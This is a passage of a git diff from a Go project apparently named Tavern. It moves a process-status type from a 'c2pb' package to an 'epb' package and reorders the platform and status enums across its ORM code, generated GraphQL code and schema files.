a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -59,7 +59,7 @@ var ( {Name: "identifier", Type: field.TypeString, Unique: true}, {Name: "name", Type: field.TypeString, Nullable: true}, {Name: "primary_ip", Type: field.TypeString, Nullable: true}, - {Name: "platform", Type: field.TypeEnum, Enums: []string{"PLATFORM_BSD", "PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS"}}, + {Name: "platform", Type: field.TypeEnum, Enums: []string{"PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS", "PLATFORM_BSD"}}, {Name: "last_seen_at", Type: field.TypeTime, Nullable: true}, } // HostsTable holds the schema information for the "hosts" table. @@ -123,7 +123,7 @@ var ( {Name: "cmd", Type: field.TypeString, Nullable: true}, {Name: "env", Type: field.TypeString, Nullable: true}, {Name: "cwd", Type: field.TypeString, Nullable: true}, - {Name: "status", Type: field.TypeEnum, Enums: []string{"STATUS_STOP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_UNKNOWN", "STATUS_IDLE", "STATUS_SLEEP", "STATUS_WAKING", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_LOCK_BLOCKED", "STATUS_DEAD", "STATUS_ZOMBIE", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_RUN"}}, + {Name: "status", Type: field.TypeEnum, Enums: []string{"STATUS_IDLE", "STATUS_STOP", "STATUS_ZOMBIE", "STATUS_LOCK_BLOCKED", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_RUN", "STATUS_DEAD", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_UNKNOWN", "STATUS_SLEEP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_WAKING"}}, {Name: "host_processes", Type: field.TypeInt, Nullable: true}, {Name: "host_process_host", Type: field.TypeInt}, {Name: "task_reported_processes", Type: field.TypeInt}, diff --git a/tavern/internal/ent/mutation.go b/tavern/internal/ent/mutation.go index fbd262586..e451cd5e3 100644 --- a/tavern/internal/ent/mutation.go +++ b/tavern/internal/ent/mutation.go @@ -12,6 +12,7 @@ import ( "entgo.io/ent" "entgo.io/ent/dialect/sql" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/file" "realm.pub/tavern/internal/ent/host" @@ -3831,7 +3832,7 @@ type HostProcessMutation struct { cmd *string env *string cwd *string - status *c2pb.Process_Status + status *epb.Process_Status clearedFields map[string]struct{} host *int clearedhost bool @@ -4393,12 +4394,12 @@ func (m *HostProcessMutation) ResetCwd() { } // SetStatus sets the "status" field. -func (m *HostProcessMutation) SetStatus(cs c2pb.Process_Status) { - m.status = &cs +func (m *HostProcessMutation) SetStatus(es epb.Process_Status) { + m.status = &es } // Status returns the value of the "status" field in the mutation. -func (m *HostProcessMutation) Status() (r c2pb.Process_Status, exists bool) { +func (m *HostProcessMutation) Status() (r epb.Process_Status, exists bool) { v := m.status if v == nil { return @@ -4409,7 +4410,7 @@ func (m *HostProcessMutation) Status() (r c2pb.Process_Status, exists bool) { // OldStatus returns the old "status" field's value of the HostProcess entity. // If the HostProcess object wasn't provided to the builder, the object is fetched from the database. // An error is returned if the mutation operation is not UpdateOne, or the database query fails. -func (m *HostProcessMutation) OldStatus(ctx context.Context) (v c2pb.Process_Status, err error) { +func (m *HostProcessMutation) OldStatus(ctx context.Context) (v epb.Process_Status, err error) { if !m.op.Is(OpUpdateOne) { return v, errors.New("OldStatus is only allowed on UpdateOne operations") } @@ -4715,7 +4716,7 @@ func (m *HostProcessMutation) SetField(name string, value ent.Value) error { m.SetCwd(v) return nil case hostprocess.FieldStatus: - v, ok := value.(c2pb.Process_Status) + v, ok := value.(epb.Process_Status) if !ok { return fmt.Errorf("unexpected type %T for field %s", value, name) } diff --git a/tavern/internal/ent/schema/host_process.go b/tavern/internal/ent/schema/host_process.go index 83889db51..d784cd873 100644 --- a/tavern/internal/ent/schema/host_process.go +++ b/tavern/internal/ent/schema/host_process.go @@ -6,7 +6,7 @@ import ( "entgo.io/ent/schema" "entgo.io/ent/schema/edge" "entgo.io/ent/schema/field" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" ) // HostProcess holds the schema definition for the HostProcess entity. @@ -48,7 +48,7 @@ func (HostProcess) Fields() []ent.Field { Optional(). Comment("The current working directory for the process."), field.Enum("status"). - GoType(c2pb.Process_Status(0)). + GoType(epb.Process_Status(0)). Comment("Current process status."), } } diff --git a/tavern/internal/graphql/generated/ent.generated.go b/tavern/internal/graphql/generated/ent.generated.go index cf6c054b5..7c96ffb74 100644 --- a/tavern/internal/graphql/generated/ent.generated.go +++ b/tavern/internal/graphql/generated/ent.generated.go @@ -16,6 +16,7 @@ import ( "github.com/99designs/gqlgen/graphql/introspection" "github.com/vektah/gqlparser/v2/ast" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" "realm.pub/tavern/internal/ent/tag" "realm.pub/tavern/internal/ent/tome" @@ -2755,9 +2756,9 @@ func (ec *executionContext) _HostProcess_status(ctx context.Context, field graph } return graphql.Null } - res := resTmp.(c2pb.Process_Status) + res := resTmp.(epb.Process_Status) fc.Result = res - return ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, field.Selections, res) + return ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, field.Selections, res) } func (ec *executionContext) fieldContext_HostProcess_status(ctx context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { @@ -10774,7 +10775,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("status")) - data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, v) if err != nil { return it, err } @@ -10783,7 +10784,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("statusNEQ")) - data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, v) if err != nil { return it, err } @@ -10792,7 +10793,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("statusIn")) - data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx, v) if err != nil { return it, err } @@ -10801,7 +10802,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("statusNotIn")) - data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx, v) if err != nil { return it, err } @@ -17852,13 +17853,13 @@ func (ec *executionContext) marshalNHostProcessOrderField2ᚖrealmᚗpubᚋtaver return v } -func (ec *executionContext) unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, v interface{}) (c2pb.Process_Status, error) { - var res c2pb.Process_Status +func (ec *executionContext) unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, v interface{}) (epb.Process_Status, error) { + var res epb.Process_Status err := res.UnmarshalGQL(v) return res, graphql.ErrorOnPath(ctx, err) } -func (ec *executionContext) marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v c2pb.Process_Status) graphql.Marshaler { +func (ec *executionContext) marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v epb.Process_Status) graphql.Marshaler { return v } @@ -18750,7 +18751,7 @@ func (ec *executionContext) marshalOHostProcess2ᚕᚖrealmᚗpubᚋtavernᚋint return ret } -func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx context.Context, v interface{}) ([]c2pb.Process_Status, error) { +func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx context.Context, v interface{}) ([]epb.Process_Status, error) { if v == nil { return nil, nil } @@ -18759,10 +18760,10 @@ func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavern vSlice = graphql.CoerceList(v) } var err error - res := make([]c2pb.Process_Status, len(vSlice)) + res := make([]epb.Process_Status, len(vSlice)) for i := range vSlice { ctx := graphql.WithPathContext(ctx, graphql.NewPathWithIndex(i)) - res[i], err = ec.unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, vSlice[i]) + res[i], err = ec.unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, vSlice[i]) if err != nil { return nil, err } @@ -18770,7 +18771,7 @@ func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavern return res, nil } -func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx context.Context, sel ast.SelectionSet, v []c2pb.Process_Status) graphql.Marshaler { +func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx context.Context, sel ast.SelectionSet, v []epb.Process_Status) graphql.Marshaler { if v == nil { return graphql.Null } @@ -18797,7 +18798,7 @@ func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋ if !isLen1 { defer wg.Done() } - ret[i] = ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, sel, v[i]) + ret[i] = ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, sel, v[i]) } if isLen1 { f(i) @@ -18817,16 +18818,16 @@ func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋ return ret } -func (ec *executionContext) unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, v interface{}) (*c2pb.Process_Status, error) { +func (ec *executionContext) unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, v interface{}) (*epb.Process_Status, error) { if v == nil { return nil, nil } - var res = new(c2pb.Process_Status) + var res = new(epb.Process_Status) err := res.UnmarshalGQL(v) return res, graphql.ErrorOnPath(ctx, err) } -func (ec *executionContext) marshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v *c2pb.Process_Status) graphql.Marshaler { +func (ec *executionContext) marshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v *epb.Process_Status) graphql.Marshaler { if v == nil { return graphql.Null } diff --git a/tavern/internal/graphql/generated/root_.generated.go b/tavern/internal/graphql/generated/root_.generated.go index dcc444405..5f26b5627 100644 --- a/tavern/internal/graphql/generated/root_.generated.go +++ b/tavern/internal/graphql/generated/root_.generated.go @@ -1891,11 +1891,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -1942,21 +1942,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects. diff --git a/tavern/internal/graphql/gqlgen.yml b/tavern/internal/graphql/gqlgen.yml index 3deeb4ec7..e7faf746d 100644 --- a/tavern/internal/graphql/gqlgen.yml +++ b/tavern/internal/graphql/gqlgen.yml @@ -67,4 +67,4 @@ models: - realm.pub/tavern/internal/ent/tome.Tactic Status: model: - - realm.pub/tavern/internal/c2/c2pb.Process_Status + - realm.pub/tavern/internal/c2/epb.Process_Status diff --git a/tavern/internal/graphql/schema.graphql b/tavern/internal/graphql/schema.graphql index 243f87f31..2ccc51166 100644 --- a/tavern/internal/graphql/schema.graphql +++ b/tavern/internal/graphql/schema.graphql @@ -524,11 +524,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -575,21 +575,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects. diff --git a/tavern/internal/graphql/schema/ent.graphql b/tavern/internal/graphql/schema/ent.graphql index 56d217a48..4408ada07 100644 --- a/tavern/internal/graphql/schema/ent.graphql +++ b/tavern/internal/graphql/schema/ent.graphql @@ -519,11 +519,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -570,21 +570,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects. diff --git a/tavern/internal/www/schema.graphql b/tavern/internal/www/schema.graphql index 243f87f31..2ccc51166 100644 --- a/tavern/internal/www/schema.graphql +++ b/tavern/internal/www/schema.graphql @@ -524,11 +524,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -575,21 +575,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects.